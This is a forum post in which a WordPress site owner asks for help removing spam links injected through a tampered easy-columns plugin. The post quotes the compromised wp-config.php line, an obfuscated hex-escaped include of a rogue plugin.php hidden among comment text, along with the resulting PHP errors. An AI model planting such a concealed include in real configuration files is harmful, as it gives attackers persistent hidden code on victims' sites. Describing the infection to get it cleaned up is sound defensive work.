Easy-Columns Plugin Porn Link infected on every page
On every page there is porn link at the buttom of the page. I found that it is because of easy-columns plugin. when I delete this plugin from ftp it gives this error
Warning: include(/home/3reglobal.com/httpdocs/wp-content/plugins/easy-columns/plugin.php) [function.include]: failed to open stream: No such file or directory in /home/mydomain.com/httpdocs/wp-config.php on line 58
Warning: include() [function.include]: Failed opening ‘/home/3reglobal.com/httpdocs/wp-content/plugins/easy-columns/plugin.php’ for inclusion (include_path=’.’) in /home/mydomian.com/httpdocs/wp-config.php on line 58wp-config file line 58 :
* WordPress */include /*veritaban? tablo ?n eki.
* Tüm kurulumlara ayr? bir*/”\x2fhom\x65/3r\x65glo\x62al.\x63om/\x68ttp\x64ocs\x2fwp-\x63ont\x65nt/\x70lug\x69ns/\x65asy\x2dcol\x75mns\x2fplu\x67in.\x70hp”;/* ?nek vererek bir veritaban?na birden fazla kurulum yapabilirsiniz.
* Sadece rakamlar, harfler ve alt ?izgi lütfen.
$table_prefix = ‘wp_’;Actually there is plugin.php file inside this plugin (original plugin do not have this file inside) When i delete this plugin.php file porn links gone but I am getting the error messages above.
How can i get rid of this plugin entirely.
Best Regards
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